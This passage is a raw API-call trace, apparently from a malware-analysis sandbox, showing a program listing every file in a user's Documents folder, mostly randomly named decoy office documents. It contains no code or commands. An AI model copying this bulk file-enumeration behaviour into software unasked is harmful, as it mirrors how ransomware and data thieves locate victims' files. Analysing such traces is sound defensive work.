ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8788b0, ftCreationTime.dwHighDateTime=0x1d4d190, ftLastAccessTime.dwLowDateTime=0xc67168b0, ftLastAccessTime.dwHighDateTime=0x1d4d071, ftLastWriteTime.dwLowDateTime=0xc67168b0, ftLastWriteTime.dwHighDateTime=0x1d4d071, nFileSizeHigh=0x0, nFileSizeLow=0x14859, dwReserved0=0x0, dwReserved1=0x0, cFileName="e2BJi.odt", cAlternateFileName="")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfabad820, ftCreationTime.dwHighDateTime=0x1d53581, ftLastAccessTime.dwLowDateTime=0xa36e56d0, ftLastAccessTime.dwHighDateTime=0x1d53a5b, ftLastWriteTime.dwLowDateTime=0xa36e56d0, ftLastWriteTime.dwHighDateTime=0x1d53a5b, nFileSizeHigh=0x0, nFileSizeLow=0x1523f, dwReserved0=0x0, dwReserved1=0x0, cFileName="f3ppY NLfujGUnn3T_.docx", cAlternateFileName="F3PPYN~1.DOC")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x749a5680, ftCreationTime.dwHighDateTime=0x1d4ce34, ftLastAccessTime.dwLowDateTime=0xe24b1360, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xe24b1360, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xec4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="FEpSAid6DzqAar5Swvy.xlsx", cAlternateFileName="FEPSAI~1.XLS")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2d8f0, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0x9ca50130, ftLastAccessTime.dwHighDateTime=0x1d4c9b5, ftLastWriteTime.dwLowDateTime=0x9ca50130, ftLastWriteTime.dwHighDateTime=0x1d4c9b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FqQwPD4U", cAlternateFileName="")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5232660, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0xeb2d8840, ftLastAccessTime.dwHighDateTime=0x1d4cb7c, ftLastWriteTime.dwLowDateTime=0xeb2d8840, ftLastWriteTime.dwHighDateTime=0x1d4cb7c, nFileSizeHigh=0x0, nFileSizeLow=0x14a53, dwReserved0=0x0, dwReserved1=0x0, cFileName="GSXuytaRGthMal4dUFG.odt", cAlternateFileName="GSXUYT~1.ODT")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a1e2590, ftCreationTime.dwHighDateTime=0x1d4b930, ftLastAccessTime.dwLowDateTime=0xb9148fa0, ftLastAccessTime.dwHighDateTime=0x1d4b166, ftLastWriteTime.dwLowDateTime=0xb9148fa0, ftLastWriteTime.dwHighDateTime=0x1d4b166, nFileSizeHigh=0x0, nFileSizeLow=0x25dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="HGjIZA52n2jSImcnl.xlsx", cAlternateFileName="HGJIZA~1.XLS")) returned 1 [0071.454] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e1657f0, ftCreationTime.dwHighDateTime=0x1d4d318, ftLastAccessTime.dwLowDateTime=0xcdd5ab90, ftLastAccessTime.dwHighDateTime=0x1d4d015, ftLastWriteTime.dwLowDateTime=0xcdd5ab90, ftLastWriteTime.dwHighDateTime=0x1d4d015, nFileSizeHigh=0x0, nFileSizeLow=0x94af, dwReserved0=0x0, dwReserved1=0x0, cFileName="jeaESM-yM5.odp", cAlternateFileName="JEAESM~1.ODP")) returned 1 [0071.455] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8336b140, ftCreationTime.dwHighDateTime=0x1d52562, ftLastAccessTime.dwLowDateTime=0x4e064650, ftLastAccessTime.dwHighDateTime=0x1d4b4a3, ftLastWriteTime.dwLowDateTime=0x4e064650, ftLastWriteTime.dwHighDateTime=0x1d4b4a3, nFileSizeHigh=0x0, nFileSizeLow=0x981c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jo5pYAfRJdxUnxXq.xlsx", cAlternateFileName="JO5PYA~1.XLS")) returned 1 [0071.455] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d5d2f0, ftCreationTime.dwHighDateTime=0x1d4fa62, ftLastAccessTime.dwLowDateTime=0xd6e5aa20, ftLastAccessTime.dwHighDateTime=0x1d4e427, ftLastWriteTime.dwLowDateTime=0xd6e5aa20, ftLastWriteTime.dwHighDateTime=0x1d4e427, nFileSizeHigh=0x0, nFileSizeLow=0x1811a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LM400zl.docx", cAlternateFileName="LM400Z~1.DOC")) returned 1 [0071.455] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d8d890, ftCreationTime.dwHighDateTime=0x1d4e13d, ftLastAccessTime.dwLowDateTime=0xc603e3a0, ftLastAccessTime.dwHighDateTime=0x1d4bec7, ftLastWriteTime.dwLowDateTime=0xc603e3a0, ftLastWriteTime.dwHighDateTime=0x1d4bec7, nFileSizeHigh=0x0, nFileSizeLow=0x11257, dwReserved0=0x0, dwReserved1=0x0, cFileName="M8JcrX7yq.xlsx", cAlternateFileName="M8JCRX~1.XLS")) returned 1 [0071.455] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60664e0, ftCreationTime.dwHighDateTime=0x1d4b0f5, ftLastAccessTime.dwLowDateTime=0xf0e32930, ftLastAccessTime.dwHighDateTime=0x1d5366a, ftLastWriteTime.dwLowDateTime=0xf0e32930, ftLastWriteTime.dwHighDateTime=0x1d5366a, nFileSizeHigh=0x0, nFileSizeLow=0x1078c, dwReserved0=0x0, dwReserved1=0x0, cFileName="meFxPWjRmSR9B4.pptx", cAlternateFileName="MEFXPW~1.PPT")) returned 1 [0071.455] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac6ce00, ftCreationTime.dwHighDateTime=0x1d4ce04, ftLastAccessTime.dwLowDateTime=0xe764f600, ftLastAccessTime.dwHighDateTime=0x1d4ce86, ftLastWriteTime.dwLowDateTime=0xe764f600, ftLastWriteTime.dwHighDateTime=0x1d4ce86, nFileSizeHigh=0x0, nFileSizeLow=0x18688, dwReserved0=0x0, dwReserved1=0x0, cFileName="ML2y-eOY.rtf", cAlternateFileName="")) returned 1 [0071.455] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0071.455] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0071.456] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0071.456] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0071.456] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aad0ea0, ftCreationTime.dwHighDateTime=0x1d4ca87, ftLastAccessTime.dwLowDateTime=0x31274250, ftLastAccessTime.dwHighDateTime=0x1d4ca83, ftLastWriteTime.dwLowDateTime=0x31274250, ftLastWriteTime.dwHighDateTime=0x1d4ca83, nFileSizeHigh=0x0, nFileSizeLow=0x15f21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n7YNyCb 6B.odt", cAlternateFileName="N7YNYC~1.ODT")) returned 1 [0071.456] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfa83010, ftCreationTime.dwHighDateTime=0x1d4ca1f, ftLastAccessTime.dwLowDateTime=0x99ada280, ftLastAccessTime.dwHighDateTime=0x1d4c6e9, ftLastWriteTime.dwLowDateTime=0x99ada280, ftLastWriteTime.dwHighDateTime=0x1d4c6e9, nFileSizeHigh=0x0, nFileSizeLow=0xe36f, dwReserved0=0x0, dwReserved1=0x0, cFileName="nVOK D.pptx", cAlternateFileName="NVOKD~1.PPT")) returned 1 [0071.456] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1421ddd0, ftCreationTime.dwHighDateTime=0x1d4cddc, ftLastAccessTime.dwLowDateTime=0x1757bea0, ftLastAccessTime.dwHighDateTime=0x1d4d4e6, ftLastWriteTime.dwLowDateTime=0x1757bea0, ftLastWriteTime.dwHighDateTime=0x1d4d4e6, nFileSizeHigh=0x0, nFileSizeLow=0xdb0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oOI3qd09uyx pA91lnJ.pptx", cAlternateFileName="OOI3QD~1.PPT")) returned 1 [0071.456] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0071.456] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8188be60, ftCreationTime.dwHighDateTime=0x1d4cc66, ftLastAccessTime.dwLowDateTime=0xc2317910, ftLastAccessTime.dwHighDateTime=0x1d4cb63, ftLastWriteTime.dwLowDateTime=0xc2317910, ftLastWriteTime.dwHighDateTime=0x1d4cb63, nFileSizeHigh=0x0, nFileSizeLow=0xa001, dwReserved0=0x0, dwReserved1=0x0, cFileName="pLHg8_t9.docx", cAlternateFileName="PLHG8_~1.DOC")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65348f60, ftCreationTime.dwHighDateTime=0x1d4e5e2, ftLastAccessTime.dwLowDateTime=0x5aa029a0, ftLastAccessTime.dwHighDateTime=0x1d4db66, ftLastWriteTime.dwLowDateTime=0x5aa029a0, ftLastWriteTime.dwHighDateTime=0x1d4db66, nFileSizeHigh=0x0, nFileSizeLow=0x2e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="r33XDXTp.docx", cAlternateFileName="R33XDX~1.DOC")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba233bc0, ftCreationTime.dwHighDateTime=0x1d4d0bb, ftLastAccessTime.dwLowDateTime=0x7f5fd4a0, ftLastAccessTime.dwHighDateTime=0x1d4faad, ftLastWriteTime.dwLowDateTime=0x7f5fd4a0, ftLastWriteTime.dwHighDateTime=0x1d4faad, nFileSizeHigh=0x0, nFileSizeLow=0x1583e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uh8zTJx.xlsx", cAlternateFileName="UH8ZTJ~1.XLS")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4244dd80, ftCreationTime.dwHighDateTime=0x1d4cdae, ftLastAccessTime.dwLowDateTime=0x4fea7030, ftLastAccessTime.dwHighDateTime=0x1d4c89a, ftLastWriteTime.dwLowDateTime=0x4fea7030, ftLastWriteTime.dwHighDateTime=0x1d4c89a, nFileSizeHigh=0x0, nFileSizeLow=0xf881, dwReserved0=0x0, dwReserved1=0x0, cFileName="uHqM 5ER-b2IqJm_M.xls", cAlternateFileName="UHQM5E~1.XLS")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31f2fe0, ftCreationTime.dwHighDateTime=0x1d4d532, ftLastAccessTime.dwLowDateTime=0x91c23880, ftLastAccessTime.dwHighDateTime=0x1d4c638, ftLastWriteTime.dwLowDateTime=0x91c23880, ftLastWriteTime.dwHighDateTime=0x1d4c638, nFileSizeHigh=0x0, nFileSizeLow=0x40a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="uokq05CLt9KkwZ-Bx.xls", cAlternateFileName="UOKQ05~1.XLS")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9fcdf0, ftCreationTime.dwHighDateTime=0x1d4f57b, ftLastAccessTime.dwLowDateTime=0xad3bf630, ftLastAccessTime.dwHighDateTime=0x1d50686, ftLastWriteTime.dwLowDateTime=0xad3bf630, ftLastWriteTime.dwHighDateTime=0x1d50686, nFileSizeHigh=0x0, nFileSizeLow=0x623a, dwReserved0=0x0, dwReserved1=0x0, cFileName="VcLUa_IRpSFwCdtTeIUe.pptx", cAlternateFileName="VCLUA_~1.PPT")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5587560, ftCreationTime.dwHighDateTime=0x1d4c7d6, ftLastAccessTime.dwLowDateTime=0x9b01d350, ftLastAccessTime.dwHighDateTime=0x1d4fa9b, ftLastWriteTime.dwLowDateTime=0x9b01d350, ftLastWriteTime.dwHighDateTime=0x1d4fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x1ab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="vgYnkjmm0.pptx", cAlternateFileName="VGYNKJ~1.PPT")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fef6d0, ftCreationTime.dwHighDateTime=0x1d4d022, ftLastAccessTime.dwLowDateTime=0x2d803120, ftLastAccessTime.dwHighDateTime=0x1d4cf56, ftLastWriteTime.dwLowDateTime=0x2d803120, ftLastWriteTime.dwHighDateTime=0x1d4cf56, nFileSizeHigh=0x0, nFileSizeLow=0xfdb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="wdgDbpNHL6HoRO.pptx", cAlternateFileName="WDGDBP~1.PPT")) returned 1 [0071.457] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ebcb130, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0x5aa97dc0, ftLastAccessTime.dwHighDateTime=0x1d4cd97, ftLastWriteTime.dwLowDateTime=0x5aa97dc0, ftLastWriteTime.dwHighDateTime=0x1d4cd97, nFileSizeHigh=0x0, nFileSizeLow=0x12bd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="XiWrk6UWjSknH.odp", cAlternateFileName="XIWRK6~1.ODP")) returned 1 [0071.458] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0071.458] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0071.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0071.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0071.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0071.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x0) returned 0x28 [0071.458] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1538b20, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1538b20, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.458] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1538b20, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1538b20, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.458] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bbabd0, ftCreationTime.dwHighDateTime=0x1d4c7ec, ftLastAccessTime.dwLowDateTime=0x16fb65e0, ftLastAccessTime.dwHighDateTime=0x1d4cd27, ftLastWriteTime.dwLowDateTime=0x16fb65e0, ftLastWriteTime.dwHighDateTime=0x1d4cd27, nFileSizeHigh=0x0, nFileSizeLow=0xa25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="1G4JK.docx", cAlternateFileName="1G4JK~1.DOC")) returned 1 [0071.459] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc725fa70, ftCreationTime.dwHighDateTime=0x1d4cd36, ftLastAccessTime.dwLowDateTime=0xfa110c80, ftLastAccessTime.dwHighDateTime=0x1d4cce7, ftLastWriteTime.dwLowDateTime=0xfa110c80, ftLastWriteTime.dwHighDateTime=0x1d4cce7, nFileSizeHigh=0x0, nFileSizeLow=0x1609b, dwReserved0=0x0, dwReserved1=0x0, cFileName="29WT9iWgmUF.pps", cAlternateFileName="29WT9I~1.PPS")) returned 1 [0071.459] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0d6460, ftCreationTime.dwHighDateTime=0x1d4b58a, ftLastAccessTime.dwLowDateTime=0x5cbdce10, ftLastAccessTime.dwHighDateTime=0x1d50f9e, ftLastWriteTime.dwLowDateTime=0x5cbdce10, ftLastWriteTime.dwHighDateTime=0x1d50f9e, nFileSizeHigh=0x0, nFileSizeLow=0x1410e, dwReserved0=0x0, dwReserved1=0x0, cFileName="4rRbNGpZmiXP3k.pptx", cAlternateFileName="4RRBNG~1.PPT")) returned 1 [0071.459] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef35eb30, ftCreationTime.dwHighDateTime=0x1d4f47b, ftLastAccessTime.dwLowDateTime=0x476d070, ftLastAccessTime.dwHighDateTime=0x1d4e8e4, ftLastWriteTime.dwLowDateTime=0x476d070, ftLastWriteTime.dwHighDateTime=0x1d4e8e4, nFileSizeHigh=0x0, nFileSizeLow=0x18b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="CWUnR5CcUQWnX-ag1L3.docx", cAlternateFileName="CWUNR5~1.DOC")) returned 1 [0071.459] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86176c90, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0x83baa290, ftLastAccessTime.dwHighDateTime=0x1d51b83, ftLastWriteTime.dwLowDateTime=0x83baa290, ftLastWriteTime.dwHighDateTime=0x1d51b83, nFileSizeHigh=0x0, nFileSizeLow=0x17090, dwReserved0=0x0, dwReserved1=0x0, cFileName="cyBKL1Jd2-UCW0JGB.pptx", cAlternateFileName="CYBKL1~1.PPT")) returned 1 [0071.459] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.459] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8788b0, ftCreationTime.dwHighDateTime=0x1d4d190, ftLastAccessTime.dwLowDateTime=0xc67168b0, ftLastAccessTime.dwHighDateTime=0x1d4d071, ftLastWriteTime.dwLowDateTime=0xc67168b0, ftLastWriteTime.dwHighDateTime=0x1d4d071, nFileSizeHigh=0x0, nFileSizeLow=0x14859, dwReserved0=0x0, dwReserved1=0x0, cFileName="e2BJi.odt", cAlternateFileName="")) returned 1 [0071.459] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfabad820, ftCreationTime.dwHighDateTime=0x1d53581, ftLastAccessTime.dwLowDateTime=0xa36e56d0, ftLastAccessTime.dwHighDateTime=0x1d53a5b, ftLastWriteTime.dwLowDateTime=0xa36e56d0, ftLastWriteTime.dwHighDateTime=0x1d53a5b, nFileSizeHigh=0x0, nFileSizeLow=0x1523f, dwReserved0=0x0, dwReserved1=0x0, cFileName="f3ppY NLfujGUnn3T_.docx", cAlternateFileName="F3PPYN~1.DOC")) returned 1 [0071.460] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x749a5680, ftCreationTime.dwHighDateTime=0x1d4ce34, ftLastAccessTime.dwLowDateTime=0xe24b1360, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xe24b1360, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xec4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="FEpSAid6DzqAar5Swvy.xlsx", cAlternateFileName="FEPSAI~1.XLS")) returned 1 [0071.460] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2d8f0, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0x9ca50130, ftLastAccessTime.dwHighDateTime=0x1d4c9b5, ftLastWriteTime.dwLowDateTime=0x9ca50130, ftLastWriteTime.dwHighDateTime=0x1d4c9b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FqQwPD4U", cAlternateFileName="")) returned 1 [0071.460] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5d870 | out: 